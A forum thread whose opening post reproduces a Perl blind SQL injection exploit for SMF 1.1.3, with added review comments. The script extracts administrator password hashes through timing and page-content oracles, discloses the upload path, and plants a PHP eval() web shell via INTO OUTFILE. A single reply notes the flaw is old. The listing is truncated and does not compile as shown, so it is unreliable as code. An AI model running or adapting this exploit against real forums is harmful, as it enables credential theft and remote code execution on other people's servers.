Author Topic: help sql injection  (Read 3373 times)


help sql injection
« on: February 12, 2009, 01:45:23 am »

#Written By Michael Brooks
#contact: th3(dot)r00k(at)gmail(dot)com

#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit!
# -Binary Search
# -Multi-Threaded
# -NO benchmark()'s
#Two SQL Injection flaws.
#Works with magic_quotes_gpc=On or Off.
#Total Bypass of SMF's SQL Injection filter.

#I submitted a patch for these flaws:

#I would like to thank RetroGod for being so skilled and willing to help me out.

#**Warning** perl will sometimes segfault when using threads.
#Tested Under Linux

use LWP::UserAgent;
use threads;
use Thread::Semaphore;

#global variables
# File-scope state shared between main() and the bin_finder worker threads.
# Only the ":shared" variables are synchronised by ithreads; the rest are
# copied into each thread at spawn time.
my $threads=1;   # worker-thread count; default 1, overridden by -n
my $semaphore = new Thread::Semaphore;   # guards $globPos (NOTE(review): indirect-object syntax; Thread::Semaphore->new is the conventional spelling)
my $globPos : shared=1;   # next character position to resolve -- presumably claimed by workers under $semaphore; the claim loop is not in this listing
my $oper : shared;        # running count of HTTP requests, printed by main() at the end
my @result : shared;      # resolved value per character position (printed as hex digits / %c by main())
my $target;               # base URL of the forum (-t)
# NOTE(review): `false` is a bareword here (no `use strict`), so $cookie holds
# the string "false", not a boolean. Whatever later tests "was -c given" must
# compare against that string; the test itself is outside this listing.
my $cookie=false;


main();#execute main
# Entry point: parse the command line, confirm the target answers the
# boolean oracle, then run the selected mode (-p / -u / -b; see the usage
# text at the end of this sub). The vulnerability check is the contradictory
# pair "and 1!=1" / "and 1=1" pushed through bin_finder(): the two answers
# must differ, otherwise the oracle is not working and the attack is aborted.
# NOTE(review): this listing is truncated -- the argv loop that sets
# $v/$user/$n, the thread joins, most closing braces and some statement
# terminators are missing, so it does not compile as shown. The comments
# below describe only what the visible lines do.
sub main{
#Process arguments passed by the command line.
# $v is presumably the index variable of an argv loop whose header is not
# visible here.
if(substr($ARGV[$v],0,1) eq '-'){

print "\nExample:\n";
print "\nbrooks@TheLab:~/code/exploits\$ ./smf_blind_sql.pl -p -u admin -t -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D
\n\nSMF Is Vulnerable!
Finding Password Hash for the Name: 'admin'
Please Standby...

Password Hash:
This attack used 161 HTTP requests and took 8 seconds to complete.
if($n != 1){
#Check to make sure the target is vulnerable
#Yes I am assuming the default table prefix, its a shame you can't access information_schema.
#No prefix is needed for the non-cookie attack becase I do not need a union select or sub-select!
bin_finder(2,1,"1","smf_members","and 1!=1");
bin_finder(2,1,"1","smf_members","and 1=1");
print "SMF Is Vulnerable!\n"
print "\nATTACK FAILED!\n\n";
print "Try sending a private message to your self or SMF might be patched.\n"
print "The non-cookie attack requires MySQL 5 so try using the exploit with -c or SMF might be patched.\n"

# -u mode: recover the 40-hex-digit password hash of the named account.
# hex_encode() turns the name into a 0x... literal, so no quote character
# reaches the query; that is why magic_quotes_gpc makes no difference here.
# NOTE(review): `!=` is numeric -- a user-name string compares as 0, so this
# branch runs whenever a name was given ($user presumably defaults to 1).
if($user != 1){
print "Finding Password Hash for the Name: '$user'\n Please Standby...\n";
# One bin_finder worker per thread; each resolves hex digits (base 16) of
# `passwd`, with conv(...,16,10) turning the digit into an integer for the
# GREATEST/LEAST comparisons.
# NOTE(review): `@threads[$x]` is a one-element slice where `$threads[$x]` is
# meant, and `new threads` is indirect-object syntax; both work but warn.
for(my $x=0;$x<$threads;$x++){
#@threads[$x]=new threads \&bin_finder,16,40,"(conv(SUBSTRING(passwd,%s,1),16,10))=%s", "smf_members"," and memberName = '".$user."'";
@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and memberName =". hex_encode($user);
# Join loop (its body is not in this listing), then @result printed as hex.
for(my $x=0;$x<$threads;$x++){
print "\nPassword Hash:\n";
foreach $y (@result){
print sprintf("%x",$y);
# -p without -u: same extraction, but against ID_MEMBER=1.
# NOTE(review): this assumes member 1 (the account created at install time)
# is still an administrator; the commented-out count(memberName)/ID_GROUP=1
# query below was the more general approach.
print "Finding An Administrative Credental.\n Please Standby...\n";
#bin_finder(128 ,1,"count(memberName)","smf_members"," and ID_GROUP=1 ");#single thread
#print "There are $admin_count admins on this forum.\n";
for(my $x=0;$x<$threads;$x++){
@threads[$x]=new threads \&bin_finder,16,40,"conv(SUBSTRING(passwd,%s,1),16,10)", "smf_members"," and ID_MEMBER=1 ";
for(my $x=0;$x<$threads;$x++){
print "\nPassword Hash:\n";
foreach $y (@result){
print sprintf("%x",$y);
# Member 1's name is needed to crack the hash (see the sha1 note in the
# usage text): first its length, then one ASCII value (base 128) per position.
bin_finder(256,1,"char_length(memberName)","smf_members"," and ID_MEMBER=1 ");#single thread

@threads[$x]=new threads \&bin_finder,128,$name_len,"ASCII(SUBSTRING(memberName,%s,1))", "smf_members"," and ID_MEMBER=1 ";
print "\nName:\n";
print sprintf("%c",@result[$l]);
print "\n";
# -b mode needs an authenticated session: the outfile payload goes through
# the PM search, which the cookie-less path cannot reach.
die("\nA cookie is needed for this attack!\n");
print "Determining the exact path to place the backdoor. \n Please standby...\n";
# Read smf_settings.attachmentUploadDir to learn a directory the web stack
# writes to and that is reachable over HTTP.
bin_finder(512,1,"char_length(value)","smf_settings"," and variable = 'attachmentUploadDir'");#single thread
for(my $x=0;$x<$threads;$x++){
@threads[$x]=new threads \&bin_finder,128,$length,"ASCII(SUBSTRING(value,%s,1))", "smf_settings"," and variable = 'attachmentUploadDir'";

for(my $x=0;$x<$threads;$x++){
print "Path Disclosed:";
foreach $y (@result){
$path.=sprintf("%c" ,$y);
print $path."\n";
#$path=~s/_/?/g;#This accounts for the search request being modfied by SMF.
$r=rand();#Random file name so the attack will succeed multiple times against the same target.
my $ua = LWP::UserAgent->new;
$ua->default_header("Cookie"=>$cookie);#Its tricky to get double quotes for the outfile statement.
# Writes a PHP eval() shell to <attachmentUploadDir>/<rand>.php with
# SELECT ... INTO OUTFILE. This only works when the forum's MySQL account
# holds the FILE privilege, mysqld can write into that directory and no
# secure_file_priv restriction applies -- which is exactly why a web app's
# DB user should never be granted FILE. Anyone who can reach the resulting
# URL runs arbitrary PHP without authentication.
# NOTE(review): inside double quotes Perl interpolates `$_GET[e]` (element
# "e" of @_GET, empty here), so the literal most likely reaches the server
# as `<?php eval();?>`; single quotes would be needed. Verify against the
# original script -- this copy may have lost them.
$load="\\,union select ".hex_encode("<?php eval($_GET[e]);?>").' into outfile "","'.$path.'/'.$r.'.php",""#';
$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
# NOTE(review): the printed URL hard-codes "attachments/" although the file
# was written under the disclosed $path; it is only right when
# attachmentUploadDir is the default directory beneath the web root.
print "\nEval Backdoor:\n".$target."attachments/".$r.".php?e=phpinfo();\n"
# Usage text (the branch that selects it is not visible here).
print "A Very Fast Blind Sql Injection Exploit for SMF 1.1.3.\n\n";
print "-p obtain passwords (if used without -u, then an admin credential will be obtained)\n";
print "-b installs a backdoor using 'into outfile'. (requires -c) **WARNING** SMF will log this as a single 'Hacking Attempt'!\n";
print "-t target\n";
print "-c A valid cookie(Much faster attack)\n";
print "\nAditional:\n";
print "-u obtains the password for a user name\n";
print "-n number of threads\n";
print "-e Shows an Example.\n"
# The hash scheme as stated by the author: sha1 of the lower-cased user
# name prepended to the password. No per-user salt, so a recovered hash
# can be attacked offline once the name is known.
# NOTE(review): $username/$password interpolate (undefined) inside the double
# quotes, so the line prints as `sha1(strtolower() . );`.
print "The password hash is generated as:\n";
print "sha1(strtolower($username) . $password);\n";
# $oper is the shared request counter; $t's start value is set outside
# this listing.
print "\nThis attack used $oper HTTP requests and took $t seconds to complete.";
print "\nEOF\n";

#Takes complex input to build the request, returns a simple bool.
# One oracle query: "does $if hold for the row selected by $table/$where?"
# Two injection points exist; which one is used depends on a condition whose
# line is missing from this listing (presumably whether -c supplied a cookie):
#  * cookie-less: public search (?action=search2), answered by timing --
#    IF(...,sleep(10),1) delays the reply when $if holds (needs MySQL 5+,
#    hence the note in main()). Ten seconds per true answer is why the
#    usage text calls the cookie variant "much faster".
#  * with cookie:  PM search (?action=pm;sa=search2), answered by content --
#    a page without "No Messages Found" means $if held.
# $ua is the caller's per-thread LWP::UserAgent. Returns $f; the statement
# that sets it to true is in the part of the body not shown here.
sub bin_ask{
my $if = shift;
my $table=shift;
my $where = shift;
my $ua = shift;
my $f=0;
#no union select or sub-select needed for this attack!
#$where="and realName = ".hex_encode("admin");
# The leading "\"\\\",\" fragment relies on how SMF tokenises userspec on
# quotes and commas; the exact mechanics are not explained in this listing.
$load="\"\\\",\" or (IF(".$if.",sleep(10),1) $where) limit 1,1 #\"";
# NOTE(review): this rewrites every '_' in the payload, including those
# inside $if/$where such as ID_MEMBER. Presumably SMF's search code maps
# '?' back to '_' server-side (a LIKE single-char wildcard) and that is what
# restores the identifiers -- verify against the SMF version targeted.
$load=~s/_/?/g;#This accounts for the search request being modfied by SMF.
$tst= $ua->post($target."?action=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"relevance%7Cdesc","brd%5B1%5D"=>1,"submit"=>"Search"]);
$page= $tst->content;
#print "<br>page:".$page;die;
# Timing sample for the sleep() oracle; the comparison against a
# pre-request timestamp is not in this listing.
# NOTE(review): $t is a package global -- main() prints the same name as the
# total elapsed seconds.
$t= time();
#print "\n 1:time\n".$t."\n\n";
}else{#%sunion select bypasses SMF's filter so i can use a sub-select in the following query.
# Everything after "union select" is one hex literal, so neither SMF's
# injection filter nor magic_quotes sees a keyword or a quote in the first
# query. Per the original comment, SMF then feeds that selected value into
# a following query, and only there does the embedded SQL execute (a
# second-order injection) -- inferred from the comment above, not shown here.
$load="\\,union select ".hex_encode("1)) or (1!=\"'\") and (select (IF((".$if."),true,false)) from ".$table." where 1 ".$where.") or (1!=\"'\") and pmr.ID_MEMBER = 1#'").' # ';#sql comments still work in SMF
$tst= $ua->post($target."?action=pm;sa=search2",["advanced"=>"1","search"=>"1","searchtype"=>"1","userspec"=>$load,"minage"=>"0","maxage"=>"9999","sort"=>"ID_PM%7Cdesc","submit"=>"Search"]);
$page= $tst->content;
#print $page; die ;
# Content oracle: the injected condition decides whether the PM search
# returns any rows.
if(index($page,"No Messages Found")==-1){
return $f;

#worker thread
# Resolves one character position ($c -- presumably claimed from the shared
# $globPos under $semaphore in the loop whose lines are missing here) of the
# value described by $question, by binary search over [0, $base-1).
# $question is a sprintf template taking the position; $table/$where select
# the row; $length is the number of positions to resolve in total. Results
# go into the shared @result. The comparisons are written as GREATEST/LEAST
# so the payload carries no '<' or '>' (blocked by SMF's filter, per the
# original comment). Each probe costs one or two bin_ask() requests.
sub bin_finder{
my $base=shift;
my $length=shift;
my $question=shift;
my $table=shift;
my $where=shift;
#One UserAgent object is used per thread.
my $ua = LWP::UserAgent->new;

#binary search:
my $n=$base-1;
my $low=0;
my $floor= $low;
my $high=$n-1;
# NOTE(review): `low` here is a bareword, not `$low` -- without `use strict`
# it is the string "low", which numifies to 0, so this computes $low+$high/2.
# Harmless while $low is 0, wrong once the search loop (outside this listing)
# narrows from the bottom.
my $pos= $low+(($high-low)/2);
my $f=1;
# GREATEST(v,p)!=p  <=>  v>p      LEAST(v,p)!=p  <=>  v<p
$great="GREATEST(".sprintf($question,$c).",".$pos.")!=".$pos;#bypass the filter for the < and > characters
$less ="LEAST(".sprintf($question,$c).",".$pos.")!=".$pos;
if(bin_ask($great, $table,$where,$ua)){#asking the sql database if the current value is greater than $pos
if($pos==$n-1){#if this is true then the value must be the modulus.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
}elsif(bin_ask($less, $table,$where,$ua)){#asking the sql database if the current value is less than $pos
if($pos==$floor+1){#if this is true the value must be zero.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";
#both greater than and less then where asked, so thats two http requests.
#print "\nDBG found:$c:ascii:".sprintf('%c',$pos)."\n";,,
#hex_encode was ported from one of RetroGod's php exploits.
#Thanks be to rGod for telling me about this encoding method on milw0rm's forum back when it was still up.
#rGot you are leet!
# Renders $my_string as a MySQL hex literal ("0x" followed by two hex digits
# per byte) so the value carries no quote characters past magic_quotes or
# SMF's filter. The per-character conversion that fills $temp is missing
# from this listing; the length==1 test is its zero-padding step.
sub hex_encode{
my $my_string=shift;
my $encoded="0x";
my $len=length($my_string);
# NOTE(review): $k is an undeclared package global (no `my`).
for ($k=0; $k<$len; $k++){
if (length($temp)==1) {
return $encoded;


Re: help sql injection
« Reply #1 on: February 12, 2009, 07:16:26 am »
That only applies to old versions (SMF 1.1.3).
